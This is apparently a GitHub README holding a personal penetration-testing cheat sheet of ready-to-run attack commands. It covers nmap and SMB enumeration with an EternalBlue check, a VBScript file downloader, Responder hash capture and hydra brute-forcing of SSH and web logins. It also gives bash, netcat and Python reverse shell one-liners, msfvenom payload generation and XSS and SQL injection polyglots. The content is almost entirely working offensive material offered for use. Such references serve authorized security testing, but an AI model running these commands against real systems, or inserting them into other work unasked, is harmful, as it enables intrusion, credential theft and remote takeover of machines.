Personal pentesting cheatsheet
Switch branches/tags
Nothing to show
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Failed to load latest commit information.
README.md

README.md

Discovery

Enumeration

Active Scanning

Assumes there's an ips.txt file with the IPs to target.

Full TCP scan

nmap -v1 -A -T4 -p- -sS -oA full_tcp -iL ips.txt

Full TCP + UDP scan (super long)

nmap -v1 -A -T4 -p- -sS -sU -oA full_tcp_udp -iL ips.txt

Common TCP ports

nmap -v1 -sS -Pn -p 21,22,23,25,53,80,111,135,137,138,139,161,389,443,445,873,1099,1194,1433,1434,2049,2082,2083,2376,2780,3260,3306,3389,5060,5061,5432,5500,5984,6379,8000,8080,8081,8200,8888,8098,9000,9050,9090,9091,9143,10099,10199,10443,9160,9443,8443,10000,11211,20000,27000,27001,27018,27019,27017,28017,60893 --open -oA common_tcp -iL ips.txt

SMB enumeration and show Eternal Blue vulnerable machines

nmap -v1 -p 139,445 --open --script smb-vuln-ms17-010 -oA smb_eternal_blue -iL ips.txt

SMTP users enumeration

nmap --script smtp-enum-users.nse -p 25,465,587 -iL ips.txt

RDP encryption enumeration and ms12-020

nmap -p 3389 --script rdp-enum-encryption,rdp-vuln-ms12-020 -iL ips.txt

Services enumeration

host -t ns megacorpone.com
host -t mx megacorpone.com

List SMB shares

smbclient -L <ip> -U <user> -I //<ip> <password>

Exploitation

wget on Windows

Usage: cscript wget.vbs http://<ip>/<file.exe> <file.exe>

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http is Nothing then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http is Nothing then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http is Nothing then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.close >> wget.vbs

Try to map and list content of every shared smb resource

cat <ips_file> | xargs -n1 -i enum4linux -S -w <domain> -u <user> -p <pass> {}

NSF

apt install nfs-common
mount -t nfs <ip>:/<path> /mnt/ -nolock

Capture LLMNR/NetBios hashes with Responder

git clone https://github.com/lgandx/Responder.git
python Responder.py -I eth0 -rPv

SSH

Test with a wordlist as password

hydra -V -L <users_list> -P <passwords_list> <ip> ssh -o hydra-ssh-attack.txt

Try all 4 digits combination of lowercase, uppercase and numbers

hydra -V -l <username> -x 4:4:aA1 <ip> ssh -o hydra-ssh-attack.txt

Listen for a reverse shell

nc -l -p 9999 -vvv

Reverse shell with a public host relay

From the internal machine, initiate the reverse shell

ssh -f -N -T -R 2200:localhost:22 user@public_host

From the public host access the reversed shell that's forwarded on 2200

ssh -p 2200 user@localhost

Post Exploitation

Reverse Shell

Listener

nc -lv 4444

Bash

bash -i >& /dev/tcp/<ip>/4444 0>&1

Netcat

nc -e /bin/sh <ip> 4444

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Metasploit

msfvenom

https://netsec.ws/?p=331

msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -f python

Reverse Handler

msf > use multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

Run with Docker

docker run --rm -i -t -p 9990-9999:9990-9999 -v /home/root/.msf4:/root/.msf4 -v /tmp/msf:/tmp/data --name msf metasploitframework/metasploit-framework

Web

Login Forms

hydra <ip> http-form-post "<local_uri>:user=^USER^&pass=^PASS^:<error_msg>" -L <users.txt> -P <pass.txt> -t 20 -w 30 -o hydra-http-post-attack.txt

Polyglots

XSS

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

SQLi

SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample

Misc

rsync a full directory

rsync -azvP <source>/ <dest>

Simple HTTP server

python -m SimpleHTTPServer 80

Filesystem

Directory size

du -sh directory_name

Compress

tar -zcvf {.tgz-file} {files}

Users

Add a new user with sudo

useradd -G sudo -d /home/<user> -m <user>
passwd <user>

Add sudo to an existing user

usermod -a -G sudo <user>

Links

Penetration Testing Cheat Sheets